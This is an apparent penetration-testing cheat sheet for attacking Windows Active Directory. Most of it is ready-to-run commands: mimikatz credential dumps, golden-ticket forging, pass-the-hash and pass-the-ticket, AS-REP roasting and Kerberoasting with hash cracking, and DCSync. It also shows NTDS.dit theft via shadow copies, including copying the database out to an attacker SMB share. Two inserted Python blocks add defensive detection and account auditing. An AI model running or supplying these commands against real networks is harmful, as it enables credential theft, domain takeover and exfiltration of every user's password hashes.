Active Directory
- Active Directory Basics
- Attacking Kerberos
- Exploiting a Domain Controller
- Post exploitation tasks
mimikatz http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/
Bypassing UAC https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html
Lateral move https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://medium.com/r3d-buck3t/play-with-hashes-over-pass-the-hash-attack-2030b900562d
Dante https://karol-mazurek95.medium.com/dante-guide-htb-a7dfd0387a9c
AD enum https://notes.offsec-journey.com/privilege-escalation/domain-privilege-escalation#common-misconfigurations
https://github.com/jesusgavancho/TryHackMe_and_HackTheBox/blob/master/Windows%20Local%20Persistence.md
https://benheater.com/tryhackme-exploiting-active-directory/
https://trojand.com/cheatsheet/Windows/Initial_Foothold.html
GUI - Desktop
User password reset
Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
Force a password reset at the next logon
Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose
RDP
Remotely enable RDP using CrackMapExec
sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable
RDP through Pass-the-Hash
xfreerdp /u:USER /d:DOMAIN /pth:NTLM /v:server.domain.local
RDP using mimikatz and PtH
sekurlsa::pth /user:user /domain:domain.local /ntlm:xxxxxxxxxxxxxxx /run:"mstsc.exe /restrictedadmin"
Mimikatz
Full dump
mimikatz.exe "token::elevate" "privilege::debug" "lsadump::lsa" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "sekurlsa::logonpasswords"
Run as administrator (ensure this outputs Privilege '20' OK)
privilege::debug
Dump hashes
lsadump::lsa /patch
List active user sessions
sekurlsa::logonPasswords full
Get user password hashes and export to a text file
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt
Golden Ticket
Dump the NTLM hash of the Kerberos Ticket Granting Ticket account (krbtgt) and the domain's security identifier; together they allow you to create a golden ticket.
Dump the krbtgt hash (krbtgt is the account whose key signs every TGT)
lsadump::lsa /inject /name:krbtgt
Create a Golden Ticket (/sid is the domain SID, e.g. from Get-DomainSID, not the krbtgt hash; /krbtgt is the krbtgt NTLM hash)
kerberos::golden /user:Administrator /domain:controller.local /sid:<DOMAIN-SID> /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
Open a new command prompt that carries the ticket (elevated access to all machines in the domain)
misc::cmd
Pass the Ticket w/ Mimikatz
Now that we have our ticket ready we can now perform a pass the ticket attack to gain domain admin privileges.
1. kerberos::ptt ticket
2. klist - here we're just verifying that we successfully imported the ticket by listing our cached tickets.
Ldap
Get machines names
crackmapexec smb 192.168.98.100-102
Initial info gathering
python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.98.100 -t info
nmap -n -sV --script "ldap* and not brute" 172.31.3.2 -Pn
Get naming context
# We can also check the nmap results directly
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts
python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.10.100 -t info
Retrieve users (some users might be missing, so it's worth doing an RPC request as well)
ldapsearch -x -H ldap://192.168.98.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
cat ldap_dc.txt | grep -i samaccountname | sed -e 's/samaccountname: //gi'
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com"
# We can also be more precise with a filter and an attribute list
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com" '(objectClass=*)' "sAMAccountName" | grep sAMAccountName
Check ldap entries
nmap -p389 10.0.2.23 --script=ldap-search
ldapsearch -x -b "dc=cyber,dc=com" -H ldap://10.0.2.23
# On Windows we can use LdapAdmin instead
Dump ldap data
ldapdomaindump -u dictionary.csl\\izabel -p "June2013" -o ldapdomaindump_artifacts 172.31.3.4
To retrieve the password field (which might not be included in our results), we can SSH to the LDAP server and run slapcat (the password values are stored base64-encoded):
sudo slapcat
RPC
Retrieve users entries
rpcclient 10.10.10.100
rpcclient -U '' 10.10.10.100
rpcclient -U '' -N 10.10.10.100
# enumdomusers
# querydispinfo
# querydisplayinfo
crackmapexec smb megabank.local -u '' -p '' --users
Active Directory
Query the AD (with a domain user)
nmap -p389 10.0.2.23 --script=ldap-search --script-args="ldap.username=cybex\adam,ldap.password=Blue231,qfilter=users" -Pn
We can also use JXplorer (a GUI LDAP browser)
sudo apt install jxplorer
NTDS.dit & SYSTEM hive
Method 1
Make an accessible copy of the Active Directory Database
reg save HKLM\SYSTEM C:\system.hive
Copy the database and the hive to our Kali box over an SMB share
cp ntds.dit \\IP\smb\ntds.dit
cp C:\system.hive \\IP\smb\system.hive
Retrieve the hashes from them offline (the LOCAL target tells secretsdump to parse the files instead of connecting to a host)
secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Method 2
Make an accessible copy of the Active Directory Database
reg save HKLM\SYSTEM C:\temp\sys
Use vssadmin to create a shadow copy, from which the locked ntds.dit can be copied
vssadmin create shadow /for=C:
Copy ntds.dit to C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit
Repair any corrupted pages in the copied database (the file was copied while in use)
ESENTUTL /p c:\temp\dit /!1024 /8 /o
On Windows, dump the hashes of all the users with DSInternals
powershell -ep bypass
Import-Module DSInternals
$key = Get-BootKey -SystemHiveFilePath c:\temp\sys
Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit
More about VSS
The Volume Shadow Copy Service (VSS) takes read-only snapshots of entire volumes periodically. In the case of VSS, a volume refers to a drive letter, typically the C drive.
These snapshots are used as backup points in a similar way to 'restore' points found in XP and any prior version. However, unlike a standard versioning system, VSS does not allow for shadow copies of individual files to be created, dealing only in full volumes. To optimize space these shadow copies only store the difference in the state of a snapshot, not a full copy of the file structure.
Standard users have no access to the VSS. Administrators have access to vssadmin, which can be used to create, list, and recover data from a shadow copy.
It is possible to list and recover individual files from the VSS, as per the three-step process below:
1. vssadmin list shadows
2. set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
3. for /R %VSHADOW_DEVICE%\ %i in (*) do @echo %i
(Be aware that the output is verbose)
It’s also possible to copy specific files from the Volume Shadow Copy, directly to your own local system. An example of what that command would look like has been provided below:
copy %VSHADOW_DEVICE%\Users\Administrator\Desktop\secretfile.txt c:\Users\Administrator\Desktop
VSS is useful for recovering files that have been encrypted by ransomware, logs, and files that have been removed by an attacker, or even just for accidentally deleted files.
Please refer to the following MSDN article and vssadmin usage guide for more information on the subject.
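From the defender's side, the "Method 2" chain above (shadow copy, ntds.dit copied out of the shadow device, SYSTEM hive export, esentutl repair) is easy to spot in process-creation telemetry. The following is an added example, not part of the original notes: it runs four stage detections over constructed 4688-style records (host, user, command line are assumed field names, not real logs) and flags a host only when several stages appear together, since a lone vssadmin call is routine admin activity.

```python
import re
from collections import defaultdict

# Constructed 4688 process-creation records as (host, subject user, command line);
# not real telemetry. The four DC01 lines mirror "Method 2" above.
SAMPLE_4688 = [
    ("DC01", "CORP\\backup", "vssadmin create shadow /for=C:"),
    ("DC01", "CORP\\backup", "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit c:\\temp\\dit"),
    ("DC01", "CORP\\backup", "reg save HKLM\\SYSTEM C:\\temp\\sys"),
    ("DC01", "CORP\\backup", "ESENTUTL /p c:\\temp\\dit /!1024 /8 /o"),
    ("WS07", "CORP\\alice", "vssadmin list shadows"),
]

# One regex per stage of the extraction chain, matched against the command line.
STAGES = [
    ("shadow_create", re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("ntds_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)),
    ("system_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
    ("ntds_repair", re.compile(r"esentutl(\.exe)?\s+/p\b", re.I)),
]

def match_stages(records):
    """Return (host, user, stage, cmdline) for every record whose command line hits a stage."""
    hits = []
    for host, user, cmdline in records:
        for stage, pattern in STAGES:
            if pattern.search(cmdline):
                hits.append((host, user, stage, cmdline))
    return hits

def flag_hosts(hits, min_stages=2):
    """{host: sorted stages} for hosts where at least min_stages distinct stages were seen.
    One stage alone (an admin listing or creating a shadow) is routine; several together are not."""
    seen = defaultdict(set)
    for host, _user, stage, _cmd in hits:
        seen[host].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in flag_hosts(match_stages(SAMPLE_4688)).items():
        print(host, "->", ", ".join(stages))
```

The same patterns apply to Sysmon Event ID 1 command lines; the backup-operator style of Method 1 (reg save plus a copy of ntds.dit from a share) is covered by the hive-export stage only, so widen the list if that path matters to you.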
DC / Kerberos
Users enum
/opt/kerbrute userenum -d brute.csl --dc 172.31.3.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute -users /usr/share/seclists/Usernames/Names/names.txt -domain BRUTE -dc-ip brute.csl
GetNPUsers
GetNPUsers.py brute.csl/ -usersfile name.txt -format john -outputfile hash
python /opt/impacket/build/scripts-3.9/GetNPUsers.py brute.csl/ -usersfile users.txt -dc-ip 172.31.3.3 -outputfile hashes.asreproast
impacket-GetNPUsers -dc-ip $DC_IP -request 'htb.local/'
impacket-GetNPUsers -dc-ip $DC_IP active.htb/user -no-pass
sudo python2 GetNPUsers.py -request -format john -dc-ip 172.31.3.4 dictionary/izabel -no-pass
then crack with hashcat
hashcat hash.txt rockyou.txt
If GetNPUsers returns nothing and we have a user with sufficient permissions over another user, we can disable Kerberos pre-authentication on that account, which makes GetNPUsers work against it:
Set-ADAccountControl -Identity user2 -DoesNotRequirePreAuth $true
Retrieve AD users
/opt/impacket/examples/GetADUsers.py -all cyber.com/ketty.ayan:thePass! -dc-ip 192.168.98.100
Kerberoasting with GetUserSPNs
impacket-GetUserSPNs -request -dc-ip $DC_IP active.htb/SVC_TGS:password
# might need to adjust the time on the VM (Kerberos rejects large clock skew)
# sudo ntpdate $DC_IP
then crack with hashcat
hashcat -m 13100 -a 0 hash.txt rockyou.txt
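Both exposures above (pre-authentication disabled for AS-REP roasting, an SPN on a user account for Kerberoasting) are visible in the plain ldapsearch dump produced in the LDAP section, so a defender can audit for them offline. This is an added example, not part of the original notes or of Impacket: it parses a constructed LDIF fragment (the accounts and values are made up) and reports enabled accounts that carry either weakness, using the documented userAccountControl bit values.

```python
# Bits of userAccountControl used here (Microsoft's documented flag values).
ACCOUNTDISABLE = 0x0002
DONT_EXPIRE_PASSWD = 0x10000
DONT_REQ_PREAUTH = 0x400000
# Constructed LDIF in the shape ldapsearch writes to ldap_dc.txt above; not a real domain.
SAMPLE_LDIF = """\
dn: CN=svc_sql,CN=Users,DC=cyber,DC=com
sAMAccountName: svc_sql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.cyber.com:1433

dn: CN=ketty.ayan,CN=Users,DC=cyber,DC=com
sAMAccountName: ketty.ayan
userAccountControl: 4260352

dn: CN=krbtgt,CN=Users,DC=cyber,DC=com
sAMAccountName: krbtgt
userAccountControl: 514
servicePrincipalName: kadmin/changepw
"""

def parse_ldif(text):
    """One dict per blank-line-separated entry; each attribute maps to a list of values."""
    entries, current = [], {}
    for line in text.splitlines() + [""]:
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
        elif ": " in line and not line.startswith("#"):
            attr, value = line.split(": ", 1)
            current.setdefault(attr.lower(), []).append(value)
    return entries

def audit_accounts(text):
    """{sam: findings} for enabled accounts that GetNPUsers/GetUserSPNs would surface."""
    findings = {}
    for e in parse_ldif(text):
        sam = e.get("samaccountname", [""])[0]
        uac = int(e.get("useraccountcontrol", ["0"])[0])
        if not sam or sam.lower() == "krbtgt" or uac & ACCOUNTDISABLE:
            continue  # krbtgt always has an SPN; disabled accounts cannot be roasted
        issues = []
        if uac & DONT_REQ_PREAUTH:
            issues.append("asrep_roastable")
        if "serviceprincipalname" in e:
            issues.append("kerberoastable")
        if issues:  # a never-expiring password makes a cracked hash permanent
            findings[sam] = issues + (["password_never_expires"] if uac & DONT_EXPIRE_PASSWD else [])
    return findings
```

Running audit_accounts on a real dump lists what to fix: re-enable pre-authentication (the inverse of the Set-ADAccountControl line above) and move SPN-bearing accounts to group Managed Service Accounts or long random passwords.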
Secretdump
Retrieve all of the password hashes from the DC (DCSync)
impacket-secretsdump -just-dc backup:[email protected]
Tools
Start
# start a PowerShell session that ignores the execution policy
powershell -ep bypass
Import-Module .\PowerView.ps1
PowerView
Basics
Get info on the machines (part of the domain)
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer | select operatingsystem,dnshostname
DNS lookup (find the IP of a machine from its name)
Resolve-IPAddress CLIENT01
Show our Domain info
Get-NetDomain
Retrieve SID of the domain
Get-DomainSID
Retrieve the Domain controller info
Get-DomainController
About the Users / Groups
Get the users
# Long list
Get-NetUser
Get-NetUser -Username "name"
# Curated list
Get-NetUser | select samaccountname,lastlogon
Get-UserProperty -Properties lastlogon
Find the machines where the current user has local admin rights
Find-LocalAdminAccess -Verbose
Find a specific string in a user attribute (here: "built" in the Description field)
Find-UserField -SearchField Description -SearchTerm "built"
Get the groups (domain)
Get-NetGroup
Get-NetGroup -Domain htb.local
Get-NetGroup | select samaccountname
Get-NetGroup *admin*
Get-NetGroup "Sales department" | select member
Get-NetGroupMember -GroupName "Domain Admins"
Who is in what groups (domain groups)
Get-NetGroup | Get-NetGroupMember
https://powersploit.readthedocs.io/en/latest/Recon/Get-NetLocalGroupMember/
Enumerate members of a local group on a remote machine (without admin privileges)
Get-NetLocalGroupMember -ComputerName client01 -GroupName mygroup (-Credential <PSCredential>)
Get-NetLocalGroup -ComputerName client01 [-API]
User hunting: Searching in logged on accounts
# This combines multiple commands
Invoke-UserHunter
# Show who has a session on Client01
Get-NetSession -ComputerName Client01 -Verbose
# Who's connected
Get-LastLoggedOn
Get-NetLoggedOn -ComputerName Client01
Get-NetLoggedOnLocal
# can also use the Sysinternals tools
.\PsLoggedon.exe \\client01
Search for Domain Admin
# noisy
Find-LocalAdminAccess
# stealthier: enumerate commonly trafficked servers and query only those
Shares
Find shares
Invoke-ShareFinder
Find sensitive files in the domain
Invoke-FileFinder
Find all the file servers in the domain
Get-NetFileServer
Object Permissions, Group permissions (GPO)
GenericAll: full permissions on the object
GenericWrite: edit certain attributes of the object
WriteOwner: change ownership of the object
WriteDACL: edit the object's permissions (its DACL)
AllExtendedRights: change password, reset password, etc.
ForceChangePassword: change the object's password
Self: self-membership (add oneself to the group)
Get the GPO
Get-NetGPO
List who is local admin on a given machine through GPO
Find-GPOComputerAdmin -ComputerName dc01.htb.local
List anyone who can administer any machine (through GPO)
Find-GPOLocation
Organization Unit (OU)
Get-NetOU -FullData
List interesting ACLs
Invoke-ACLScanner -ResolveGUIDs
Show anyone with GenericAll on the "Management department" group
Get-ObjectAcl -SamAccountName "user1" -ResolveGUIDs
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
# Shorter version
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Other version (same filter on a user object)
Get-ObjectAcl -Identity "jen" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Translate a SecurityIdentifier (SID) to a name
"SIDXXX","OTHER-SID" | Convert-SidToName
Change password of user on domain
net user jen Password123 /domain
Impersonate, Launch a command prompt as jen
# Runas
runas /user:corp\jen powershell.exe
Bloodhound
Start
# start a PowerShell session that ignores the execution policy
powershell -ep bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -OutputPrefix "corp_audit"
Impacket
https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/
https://neil-fox.github.io/Impacket-usage-&-detection/
lookupsid.py is a tool for brute forcing Windows SIDs, which attempts to identify remote users and groups.
Enumerate the domain with lookupsid.py
for user in $(cat users.txt); do lookupsid.py svccorp.com/$user:'Password123'@172.31.2.1; done
Secretsdump is a script used to extract credentials and secrets from a system. The main use-cases for it are the following:
- Dump NTLM hashes of local users (remote SAM dump)
- Extract domain credentials via DCSync
secretsdump.py svcorp/Administrator:mypass@IP
secretsdump.py -no-pass -just-dc svcorp/user1@IP
wmiexec.py is another script part of the Impacket framework. It is used to silently execute commands against a compromised endpoint using WMI.
python3 /opt/impacket/examples/wmiexec.py -hashes ':533f1bd576caa912bdb9da284bbc60fe' 'za.tryhackme.com/[email protected]'
python3 /opt/impacket/examples/wmiexec.py 'za.tryhackme.com/administrator:[email protected]'